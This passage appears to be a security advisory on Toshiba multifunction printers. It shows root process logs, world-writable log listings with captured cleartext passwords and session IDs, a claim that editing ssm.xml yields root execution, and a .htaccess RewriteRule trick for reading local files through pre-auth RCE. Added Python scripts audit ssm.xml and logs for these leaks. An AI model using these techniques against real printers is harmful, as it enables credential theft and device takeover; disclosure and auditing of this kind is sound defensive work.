2023/05/27 20:32:56 CMD: UID=0 PID=4236 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:56 CMD: UID=0 PID=4237 | ./cissm -T 7 -d ssm.xml
2023/05/27 20:32:56 CMD: UID=0 PID=4238 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
[...]
2023/05/27 20:35:26 CMD: UID=0 PID=4393 | ./cissm -T 7 -d ssm.xml
[...]
2023/05/27 20:37:56 CMD: UID=0 PID=4532 | ./cissm -T 7 -d ssm.xml
[...]
2023/05/27 20:39:56 CMD: UID=0 PID=4676 | ./cissm -T 7 -d ssm.xml
[...]
2023/05/27 20:42:19 CMD: UID=0 PID=4831 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:19 CMD: UID=0 PID=4832 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:22 CMD: UID=0 PID=4833 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:22 CMD: UID=0 PID=4834 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:25 CMD: UID=0 PID=4835 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:25 CMD: UID=0 PID=4836 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:26 CMD: UID=0 PID=4837 | ./cissm -T 7 -d ssm.xml
2023/05/27 20:42:27 CMD: UID=0 PID=4839 | sh -c ps -eo stat,comm | grep -e "^Z.*agent" -e "^Z.*ebx_dl" -e "^Z.*de_ipfax"
2023/05/27 20:42:27 CMD: UID=0 PID=4838 | sh -c ps -eo stat,comm | grep -e "^Z.*agent" -e "^Z.*ebx_dl" -e "^Z.*de_ipfax"
2023/05/27 20:42:29 CMD: UID=0 PID=4840 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:29 CMD: UID=0 PID=4841 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:32 CMD: UID=0 PID=4842 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:32 CMD: UID=0 PID=4843 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
[...]

An attacker can remotely compromise any Toshiba printer.

Any local or remote attacker can replace the /home/SYSROM_SRC/build/common/bin/ssm.xml configuration file to run any malicious program as root when the printer starts.

An attacker can backdoor the printer.
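To make the ssm.xml finding operational, the following added Python example (not Toshiba's code and not from the original advisory) parses the service list in the format shown above, reconstructs the command line each entry launches, and diffs a live file against a known-good baseline so that an added or retargeted entry shows up. The XML is constructed from the excerpt above; CISSM_CWD is assumed from the `./cissm -T 7 -d ssm.xml` command line and the release/bin/ssm.xml symlink; the 'audit-demo' entry and the /ramdisk path in MODIFIED_XML are placeholders standing in for an edited file, not anything observed on a printer.

```python
"""Parse the service list cissm reads from ssm.xml and diff it against a
known-good copy. Added example, not Toshiba code; the XML is constructed
from the excerpt on the page and the modifications are placeholders."""
import os
import xml.etree.ElementTree as ET

# Directory cissm is started from, assumed from "./cissm -T 7 -d ssm.xml".
CISSM_CWD = '/home/SYSROM_SRC/build/release/bin'

BASELINE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<SSM xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="../../../LayerInterface/CI/ServiceStartupManager/SSM.xsd">
<Service>
<name>cischeduler</name>
<group/>
<exePath>./cischeduler</exePath>
<startupType>Automatic</startupType>
<enabled>1</enabled>
<ProcessGroup>TRUSTED</ProcessGroup>
<StartParameters>
<Param>-S</Param>
<Param>ramdisk</Param>
<Param>&gt;</Param>
<Param>/work/log/ci/cischeduler.log</Param>
</StartParameters>
</Service>
<Service>
<name>cipollproc</name>
<group/>
<exePath>./cipollproc</exePath>
<startupType>Automatic</startupType>
<enabled>1</enabled>
<ProcessGroup>TRUSTED</ProcessGroup>
<StartParameters>
<Param>&gt;</Param>
<Param>/work/log/ci/cipollproc.log</Param>
</StartParameters>
<StartupCondition>
<Condition>
<Service name="cischeduler" state="Ready"></Service>
</Condition>
</StartupCondition>
</Service>
</SSM>
"""

# Constructed: one extra entry and one retargeted exePath, as an edited
# file might look. Placeholder names, not observed on a device.
EXTRA_SERVICE = """<Service>
<name>audit-demo</name>
<group/>
<exePath>/tmp/audit-demo.sh</exePath>
<startupType>Automatic</startupType>
<enabled>1</enabled>
<ProcessGroup>TRUSTED</ProcessGroup>
</Service>
"""
MODIFIED_XML = (BASELINE_XML
                .replace('<exePath>./cipollproc</exePath>', '<exePath>/ramdisk/cipollproc</exePath>')
                .replace('</SSM>', EXTRA_SERVICE + '</SSM>'))


def parse_ssm(xml_text):
    """Return {name: entry} for each service definition.

    Only direct <Service> children of <SSM> are definitions; the <Service>
    inside <StartupCondition> is a reference to another service and must not
    be counted as an entry (root.iter('Service') would get that wrong)."""
    root = ET.fromstring(xml_text.encode('utf-8'))
    services = {}
    for svc in root.findall('Service'):
        services[svc.findtext('name')] = {
            'exePath': svc.findtext('exePath'),
            'enabled': svc.findtext('enabled') == '1',
            'group': svc.findtext('ProcessGroup'),
            'params': [p.text or '' for p in svc.findall('StartParameters/Param')],
            'after': [c.get('name') for c in svc.findall('StartupCondition/Condition/Service')],
        }
    return services


def command_line(entry, cwd=CISSM_CWD):
    """Best-effort reconstruction of what cissm launches for an entry.
    The bare '>' parameter in the real file indicates the argument list is
    handed to a shell, so redirections and metacharacters in an entry
    deserve a second look."""
    exe = entry['exePath']
    if exe.startswith('./'):
        exe = os.path.join(cwd, exe[2:])
    return ' '.join([exe] + entry['params'])


def diff_services(baseline, current):
    """Names added, removed or changed between two parsed service lists."""
    return {
        'added': sorted(set(current) - set(baseline)),
        'removed': sorted(set(baseline) - set(current)),
        'changed': sorted(n for n in set(baseline) & set(current) if baseline[n] != current[n]),
    }


if __name__ == '__main__':
    base, cur = parse_ssm(BASELINE_XML), parse_ssm(MODIFIED_XML)
    for name, entry in sorted(cur.items()):
        print('{:<12} {}'.format(name, command_line(entry)))
    print(diff_services(base, cur))
```

A baseline can be taken from the firmware image or a freshly provisioned device and compared against the live /home/SYSROM_SRC/build/common/bin/ssm.xml. Because the file is world-writable, a clean diff only tells you that nothing has changed so far, not that nobody could change it, so the comparison belongs in a recurring check rather than a one-off audit.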

Details – Passwords stored in clear-text logs and insecure logs

It was observed that passwords are stored in clear-text logs.

Some logs are stored in the /ramdisk/work/log/al directory with insecure permissions (world-readable and world-writable), allowing any local attacker to read and modify these files:

bash-4.1# ls -laR /ramdisk/work/log/al/*
-rw-rw-rw- 1 root trusted  42678 May 23 16:10 /ramdisk/work/log/al/accounting.log.0.txt
-rw-rw-rw- 1 root trusted   2228 May 23 15:14 /ramdisk/work/log/al/address.log.0.txt
-rw-rw-rw- 1 root trusted   6877 May 23 15:16 /ramdisk/work/log/al/alPanelStartLEDHandler.log.0.txt
-rw-rw-rw- 1 root trusted  23536 May 23 16:10 /ramdisk/work/log/al/alPanelUIMessageHandler.log.0.txt
-rw-rw-rw- 1 root trusted     79 May 23 15:14 /ramdisk/work/log/al/albluetooth.log.0.txt
-rw-rw-rw- 1 root trusted    449 May 23 15:14 /ramdisk/work/log/al/alcloning.log.0.txt
-rw-rw-rw- 1 root trusted   1594 May 23 15:14 /ramdisk/work/log/al/alcloudclient.log.0.txt
-rw-rw-rw- 1 root trusted    987 May 23 15:14 /ramdisk/work/log/al/aldevauthmgmtplugin.log.0.txt
-rw-rw-rw- 1 root trusted 307378 May 23 16:11 /ramdisk/work/log/al/aldeviceconfig.log.0.txt
-rw-rw-rw- 1 root trusted  29171 May 23 15:16 /ramdisk/work/log/al/aldeviceservice.log.0.txt
-rw-rw-rw- 1 root trusted    128 May 23 15:15 /ramdisk/work/log/al/aleSCL.log.0.txt
-rw-rw-rw- 1 root trusted    474 May 23 15:14 /ramdisk/work/log/al/alexportimport.log.0.txt
-rw-rw-rw- 1 root trusted   1437 May 23 15:14 /ramdisk/work/log/al/alfilestoragem.log.0.txt
-rw-rw-rw- 1 root trusted  13465 May 23 16:11 /ramdisk/work/log/al/allicensemgmt.log.0.txt
-rw-rw-rw- 1 root trusted   5380 May 23 15:14 /ramdisk/work/log/al/almaintenanceplugin.log.0.txt
-rw-rw-rw- 1 root trusted    111 May 23 15:14 /ramdisk/work/log/al/alnfcplugin.log.0.txt
-rw-rw-rw- 1 root trusted   4432 May 23 16:05 /ramdisk/work/log/al/alulm.log.0.txt
-rw-rw-rw- 1 root trusted    682 May 23 15:14 /ramdisk/work/log/al/alvnclauncher.log.0.txt
-rw-rw-rw- 1 root trusted  67235 May 23 16:08 /ramdisk/work/log/al/appmanager.log.0.txt
-rw-rw-rw- 1 root trusted  31306 May 23 16:11 /ramdisk/work/log/al/authplugin.log.0.txt
-rw-rw-rw- 1 root trusted    590 May 23 15:15 /ramdisk/work/log/al/bonjour.log.0.txt
-rw-rw-rw- 1 root trusted 147834 May 23 16:15 /ramdisk/work/log/al/boserver.log.0.txt
-rwxrwxrwx 1 root trusted 250542 May 23 16:14 /ramdisk/work/log/al/boserverEvent.log.28.txt
-rw-rw-rw- 1 root trusted   1110 May 23 15:14 /ramdisk/work/log/al/cbamanager.log.0.txt
-rw-rw-rw- 1 root trusted     98 May 23 15:14 /ramdisk/work/log/al/eBRlog.log.0.txt
-rw-rw-rw- 1 root trusted   3311 May 23 15:15 /ramdisk/work/log/al/efile.log.0.txt
-rwxrwxrwx 1 root trusted    567 May 23 16:10 /ramdisk/work/log/al/grpmgrplugin.log.0.txt
-rw-rw-rw- 1 root trusted   2277 May 23 16:10 /ramdisk/work/log/al/hdm.log.0.txt
-rw-rw-rw- 1 root trusted    206 May 23 15:15 /ramdisk/work/log/al/ifaxrx.log.0.txt
-rw-rw-rw- 1 root trusted   1037 May 23 15:14 /ramdisk/work/log/al/jobcontroller.log.0.txt
-rw-rw-rw- 1 root trusted   4714 May 23 15:41 /ramdisk/work/log/al/jtm.log.0.txt
-rw-rw-rw- 1 root trusted    610 May 23 15:15 /ramdisk/work/log/al/logmanagerplugin.log.0.txt
-rw-rw-rw- 1 root trusted 286932 May 23 15:23 /ramdisk/work/log/al/logretriever.log.0.txt
-rw-rw-rw- 1 root trusted    214 May 23 15:15 /ramdisk/work/log/al/network-ipv6.log.0.txt
-rw-rw-rw- 1 root trusted  22498 May 23 15:16 /ramdisk/work/log/al/nsm.log.0.txt
-rw-rw-rw- 1 root trusted 169537 May 23 16:01 /ramdisk/work/log/al/panel.log.0.txt
-rw-rw-rw- 1 root trusted   3403 May 23 15:15 /ramdisk/work/log/al/printmanager.log.0.txt
-rw-rw-rw- 1 root trusted  26623 May 23 16:10 /ramdisk/work/log/al/prm.log.0.txt
-rw-rw-rw- 1 root trusted   1264 May 23 15:15 /ramdisk/work/log/al/remoteApplication.log.0.txt
-rw-rw-rw- 1 root trusted 565116 May 23 16:11 /ramdisk/work/log/al/renderer.log.2.txt
-rw-rw-rw- 1 root trusted   2434 May 23 15:14 /ramdisk/work/log/al/reportmanager.log.0.txt
-rw-rw-rw- 1 root trusted    426 May 23 15:14 /ramdisk/work/log/al/reportmsgr.log.0.txt
-rw-rw-rw- 1 root trusted  20834 May 23 16:11 /ramdisk/work/log/al/restrictionmode.log.0.txt
-rw-rw-rw- 1 root trusted    732 May 23 16:10 /ramdisk/work/log/al/rolemanagerplugin.log.0.txt
-rw-rw-rw- 1 root trusted  12464 May 23 16:11 /ramdisk/work/log/al/securitysettingsplugin.log.0.txt
-rw-rw-rw- 1 root trusted  19963 May 23 15:15 /ramdisk/work/log/al/sharedprint.log.0.txt
-rw-rw-rw- 1 root trusted    159 May 23 15:15 /ramdisk/work/log/al/slp.log.0.txt
-rw-rw-rw- 1 root trusted    798 May 23 15:15 /ramdisk/work/log/al/snmpd.log.0.txt
-rw-rw-rw- 1 root trusted  12287 May 23 15:15 /ramdisk/work/log/al/stage2.log.0.txt
-rw-rw-rw- 1 root trusted   5955 May 23 15:15 /ramdisk/work/log/al/swupdate.log.0.txt
-rw-rw-rw- 1 root trusted   2306 May 23 15:14 /ramdisk/work/log/al/usb.log.0.txt
-rw-rw-rw- 1 root trusted   1113 May 23 15:15 /ramdisk/work/log/al/usbprn.log.0.txt
-rw-rw-rw- 1 root trusted  14238 May 23 16:10 /ramdisk/work/log/al/usermanagerplugin.log.0.txt
-rw-rw-rw- 1 root trusted   2553 May 23 15:14 /ramdisk/work/log/al/viewplugin.log.0.txt

/ramdisk/work/log/al/epfx:
total 28
drwxrwxrwx 4 root trusted 0 May 23 15:14 .
drwxrwxrwx 5 root trusted 0 May 23 16:10 ..
-rwxrwxrwx 1 root trusted 28010 May 23 16:08 eprocessframework.log.0.txt
drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1711
drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1712

/ramdisk/work/log/al/wsp:
total 4
drwxrwxrwx 2 root trusted 0 May 23 15:15 .
drwxrwxrwx 5 root trusted 0 May 23 16:10 ..
-rw-rw-rw- 1 root trusted 3600 May 23 16:14 alwsprint.log.0.txt

/ramdisk/work/log/al/wsscn:
total 4
drwxrwxrwx 2 root trusted 0 May 23 15:15 .
drwxrwxrwx 5 root trusted 0 May 23 16:10 ..
-rw-rw-rw- 1 root trusted 1083 May 23 15:15 alwswsc.log.0.txt
bash-4.1#

Cleartext password written to the logs when a user logs into the printer

When a user logs into the TopAccess web interface, the password is written to world-readable logs, as shown below.

Logging in as admin with the password PASSWORD-SECRET-PIERRE, we can see the password saved in 2 log files readable by everyone:

  • /ramdisk/work/log/al/boserverEvent.log.*.txt

  • /ramdisk/al/network/log/http.log

Credential leak inside the log files:

bash-4.1# grep -ri PIER .
./work/log/al/boserverEvent.log.28.txt:<Evt><t>05/27 16:18:39443877</t><Set><sID>ContentWebServer_10.0.0.2.fda0f003cf95b852233893df36d9b1ff</sID><pID>8556</pID><pName>httpd</pName><SetValue><Payload XMLPayLoad = "true" overrideDelta = "true"><path></path><value><Authentication><UserCredential><userName>admin</userName><passwd>PASSWORD-SECRET-PIERRE</passwd><ipaddress>10.0.0.2</ipaddress><DepartmentManagement isEnable="false"><requireDepartment/></DepartmentManagement><domainName/><applicationType>TOP_ACCESS</applicationType></UserCredential></Authentication></value></Payload></SetValue></Set></Evt>
./al/network/log/http.log:[Fri May 27 16:18:39.519454 2023] [contentwebserver:debug] [pid 8556] ccontentwebserver.cpp(4175): [client 10.0.0.2:41700] PASSWORD-SECRET-PIERRE, referer: http://10.0.0.1:8080/TopAccessLogin.html?v=1670282309ta

These files have insecure permissions, allowing any user to retrieve the password and to modify the logs.

A remote attacker can also modify these files, using the pre-auth remote code execution (as root or apache) and the multiple local privilege escalation vulnerabilities.

bash-4.1# ls -la /ramdisk/al/network/log/http.log 
ls -la /ramdisk/al/network/log/http.log
-rw-rw-rw- 1 root trust 663910 May 27 16:20 /ramdisk/al/network/log/http.log
bash-4.1# ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt
ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt
-rwxrwxrwx 1 root trust 715841 May 27 16:20 /ramdisk/work/log/al/boserverEvent.log.28.txt
bash-4.1#

Cleartext password written to the logs when a password is changed

Using the TopAccess web interface, a user's password can be updated.

The new password (NEW-PASSWORD-PIERRE) can be found in the log file:

bash-4.1# grep -r NEW-PASSWORD-PIERRE .
./work/log/al/boserverEvent.log.28.txt:<Evt><t>05/27 16:22:22933938</t><Set><sID>ContentWebServer_10.0.0.2.63e5f73ea1d7ecf9cfd935393adb8b11</sID><pID>4974</pID><pName>httpd</pName><SetValue><Payload XMLPayLoad = "true" overrideDelta = "true"><path></path><value><UserManager><View><UpdateUser><User ID="10002"><Information><passwd>NEW-PASSWORD-PIERRE</passwd><UserSoftKeyboardDisplay>true</UserSoftKeyboardDisplay></Information></User></UpdateUser></View></UserManager></value></Payload></SetValue></Set></Evt>
bash-4.1#

And this log file also has insecure permissions, allowing any user to retrieve the password or to modify the log file.

A remote attacker can also modify these files, using the pre-auth remote code execution (as root or apache) and the multiple local privilege escalation vulnerabilities.

bash-4.1# ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt 
ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt
-rwxrwxrwx 1 root trust 886685 May 27 16:23 /ramdisk/work/log/al/boserverEvent.log.28.txt
bash-4.1#

An attacker can retrieve the password.

An attacker can modify the logs.

A remote attacker can also retrieve the credentials, and thereby bypass the authentication mechanism, by uploading a .htaccess file containing a RewriteRule (RewriteRule /pwned.txt file:/path/to/local/file), using the pre-auth remote code execution (as root or apache) and the multiple local privilege escalation vulnerabilities.

Details – Leak of authentication sessions in insecure logs in the /ramdisk/work/log directory

We found that the session cookies used for authentication are stored in cleartext logs. These logs are readable by everyone, and some of them can also be freely modified by any local attacker.

Some logs are stored in the /ramdisk/work/log directory with insecure permissions. Inside them we can find authentication sessions (for example ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).

Session leak in the log files:

bash-4.1# pwd
/work/log
bash-4.1# grep -r '10.0.0.2.' *
[...]
./log/al/boserverEvent.log.26.txt:<Evt><t>05/30 15:50:21222835</t><Session "timerReset"><id>ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e</id><num>658</num><pID>2670</pID><pName>alappmanager</pName><newTimerValue>0</newTimerValue></Session></Evt>
./log/al/boserver.log.0.txt:05/30 15:50:05535294 Pid= 1657,Tid= 1784,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command 'GetSettings' from Plugin to 'httpd' in SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:05552743 Pid= 1657,Tid= 1783,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command 'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:05556758 Pid= 1657,Tid= 1785,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command 'LicenseEnableCheck' from Plugin to 'httpd' in SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:14741108 Pid= 1657,Tid= 1784,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command 'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:14745065 Pid= 1657,Tid= 1783,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command 'LicenseEnableCheck' from Plugin to 'httpd' in SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/aldeviceconfig.log.0.txt: * SessionID : ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
./log/al/aldeviceconfig.log.0.txt: * DeltaDocName : hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
[...]
./log/al/aldeviceconfig.log.0.txt: * DeltaDocName : hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
./log/al/sapp/python_settingapp.log:03/16 20:57:34966 Pid= 5653 Tid= 1820326768 tweens.py 176 WARNING Add session map. key = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7
./log/al/sapp/python_settingapp.log:03/16 21:08:35016 Pid= 5653 Tid= 1675623280 tweens.py 347 WARNING Delete session map. key = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7, length1
./log/al/authplugin.log.0.txt:05/30 15:16:07935854 Pid= 1872,UserAuthManger.cpp:11476:ERR:delta Doc Name::hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/AuthenticationTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
[...]
./log/al/renderer.log.1.txt:05/30 20:21:13780508 Pid= 1992,Tid= 2939,LegacyPanel/src/cpanelmanager.cpp: 2983:WRN:Rcv ST : 72 : 1c000001 : <?xml version="1.0" encoding="UTF-8"?><Notification><Payload model="pull"><path>SecurityConfiguration/SecuritySettings/isLoginReqd</path><sessionID>ContentWebServer_10.0.0.2.ab52ced8304357f2b382460bbdd797dc</sessionID><subscriptionID>1275</subscriptionID></Payload></Notification>
[...]
/log/al/prm.log.0.txt:05/30 15:18:16563007 Pid= 1885,Tid= 2163,manager.cpp: 1874:ERR:Delta Document hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/PresentationResourcesTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e could not be opened. Creating it

We can list the files containing such authentication sessions:

  • log/al/aldeviceconfig.log.0.txt

  • log/al/appmanager.log.0.txt

  • log/al/appmanagerlibrary.log.0.txt

  • log/al/authplugin.log.0.txt

  • log/al/boserver.log.0.txt

  • log/al/boserverEvent.log.26.txt

  • log/al/epfx/eprocessframework.log.0.txt

  • log/al/prm.log.0.txt

  • log/al/renderer.log.0.txt

  • log/al/renderer.log.1.txt

  • log/al/renderer.log.2.txt

  • log/al/sapp/python_settingapp.log

  • log/al/webpanel/eapi.log.0.txt

Using the shell:

bash-4.1# grep -r '10.0.0.2.' * | sed -e 's#:# #' | awk '{ print $1 }' | sort | uniq
log/al/aldeviceconfig.log.0.txt
log/al/appmanager.log.0.txt
log/al/appmanagerlibrary.log.0.txt
log/al/authplugin.log.0.txt
log/al/boserver.log.0.txt
log/al/boserverEvent.log.26.txt
log/al/epfx/eprocessframework.log.0.txt
log/al/prm.log.0.txt
log/al/renderer.log.0.txt
log/al/renderer.log.1.txt
log/al/renderer.log.2.txt
log/al/sapp/python_settingapp.log
log/al/webpanel/eapi.log.0.txt
log/al/webpanel/python_ta.log

These files have insecure permissions, allowing any user to retrieve the authentication sessions, and some of them can be freely modified by any local attacker (or by any remote attacker running as root or apache through the pre-auth remote code execution and the multiple local privilege escalation vulnerabilities):

Insecure permissions of the log files:

bash-4.1# for i in $(grep -r '10.0.0.2.' * | sed -e 's#:# #' | awk '{ print $1 }' | sort | uniq); do ls -la $i;done
-rw-r--r-- 1 apache trusted 177116 May 30 15:51 log/al/aldeviceconfig.log.0.txt
-rw-r--r-- 1 apache trusted 57508 May 30 15:51 log/al/appmanager.log.0.txt
-rwxrwxrwx 1 root trusted 285227 May 30 16:15 log/al/appmanagerlibrary.log.0.txt
-rw-r--r-- 1 apache trusted 8839 May 30 15:51 log/al/authplugin.log.0.txt
-rw-r--r-- 1 apache trusted 57082 May 30 15:51 log/al/boserver.log.0.txt
-rwxr-xr-x 1 apache trusted 850786 May 30 15:51 log/al/boserverEvent.log.26.txt
-rwxr-xr-x 1 apache trusted 18608 May 30 15:51 log/al/epfx/eprocessframework.log.0.txt
-rw-r--r-- 1 apache trusted 18151 May 30 15:51 log/al/prm.log.0.txt
-rwxrwxrwx 1 root trusted 1048682 May 30 19:28 log/al/renderer.log.0.txt
-rwxrwxrwx 1 root trusted 1048606 May 30 21:50 log/al/renderer.log.1.txt
-rw-r--r-- 1 apache trusted 527501 May 30 15:51 log/al/renderer.log.2.txt
-rwxrwxrwx 1 apache trusted 1958 May 30 21:08 log/al/sapp/python_settingapp.log
-rwxrwxrwx 1 root trusted 669880 May 30 16:15 log/al/webpanel/eapi.log.0.txt
-rwxrwxrwx 1 apache trusted 311373 May 30 15:53 log/al/webpanel/python_ta.log

An attacker can retrieve the authentication sessions.

A remote attacker can also retrieve these sessions, and thereby bypass the authentication mechanism, by uploading a .htaccess file containing a RewriteRule (RewriteRule /pwned.txt file:/path/to/local/file), using the pre-auth remote code execution (as root or apache) and the multiple local privilege escalation vulnerabilities.
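The two leaks described above (cleartext passwords in boserverEvent.log.*.txt and http.log, and session IDs of the form ContentWebServer_<ip>.<32 hex> scattered across the /ramdisk/work/log tree) can be found with one audit pass, which is what the script below does. It is an added example, not code from the original advisory or from Toshiba. It builds a constructed copy of the log layout in a temporary directory (sample lines shortened from the grep output above, plus one invented benign usb.log line), then reports, per file, the <passwd> values, the session IDs, and whether the file is writable by "other", which is the bit that turns a disclosure bug into a log-tampering one. The directory name, the benign line and the permission bits assigned to each sample file are assumptions for the demonstration; on a real device you would point audit() at /ramdisk/work/log and /ramdisk/al/network/log instead.

```python
"""Audit a log tree for cleartext credentials, session IDs and world-writable files.

Added example (not part of the original advisory). The sample log content is
reconstructed from the advisory's grep output; the usb.log line and the
permission bits are constructed for the demonstration.
"""
import os
import re
import stat
import tempfile

# Cleartext password inside the boserverEvent XML payload: <passwd>...</passwd>
PASSWD_RE = re.compile(r"<passwd>([^<]*)</passwd>")
# Session IDs look like ContentWebServer_<client ip>.<32 lowercase hex chars>
SESSION_RE = re.compile(r"ContentWebServer_(\d{1,3}(?:\.\d{1,3}){3})\.([0-9a-f]{32})")

# Constructed sample logs, keyed by path relative to the log root.
SAMPLE_LOGS = {
    "al/boserverEvent.log.28.txt": (
        '<Evt><t>05/27 16:18:39443877</t><Set><sID>ContentWebServer_10.0.0.2.'
        'fda0f003cf95b852233893df36d9b1ff</sID><pID>8556</pID><pName>httpd</pName>'
        '<SetValue><Payload XMLPayLoad = "true" overrideDelta = "true"><path></path>'
        '<value><Authentication><UserCredential><userName>admin</userName>'
        '<passwd>PASSWORD-SECRET-PIERRE</passwd><ipaddress>10.0.0.2</ipaddress>'
        '</UserCredential></Authentication></value></Payload></SetValue></Set></Evt>\n'
        '<Evt><t>05/27 16:22:22933938</t><Set><sID>ContentWebServer_10.0.0.2.'
        '63e5f73ea1d7ecf9cfd935393adb8b11</sID><SetValue><Payload><value>'
        '<UserManager><View><UpdateUser><User ID="10002"><Information>'
        '<passwd>NEW-PASSWORD-PIERRE</passwd></Information></User></UpdateUser>'
        '</View></UserManager></value></Payload></SetValue></Set></Evt>\n'
    ),
    "al/boserver.log.0.txt": (
        "05/30 15:50:05535294 Pid= 1657,Tid= 1784,cborepository.cpp: 5340:WRN:"
        "HANDLECMD_RES: Response of Command 'GetSettings' from Plugin to 'httpd' in "
        "SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).\n"
    ),
    # Constructed benign line: no secret, but the file is still world-writable.
    "al/usb.log.0.txt": "05/23 15:14 usb: no device attached\n",
}
# Assumed permission bits, mirroring the mix of 777 / 644 / 666 seen on the device.
SAMPLE_MODES = {
    "al/boserverEvent.log.28.txt": 0o777,
    "al/boserver.log.0.txt": 0o644,
    "al/usb.log.0.txt": 0o666,
}


def build_sample_tree(root):
    """Write the constructed logs under root with the chosen permission bits."""
    for rel, content in SAMPLE_LOGS.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, SAMPLE_MODES[rel])  # chmod ignores umask, so bits land as given


def scan_file(path):
    """Return (passwords, session_ids) found in one log file, in order of appearance."""
    with open(path, errors="replace") as fh:
        data = fh.read()
    passwords = PASSWD_RE.findall(data)
    sessions = sorted({"ContentWebServer_%s.%s" % (ip, h) for ip, h in SESSION_RE.findall(data)})
    return passwords, sessions


def audit(root):
    """Walk root and report every file that leaks a secret or is writable by 'other'."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
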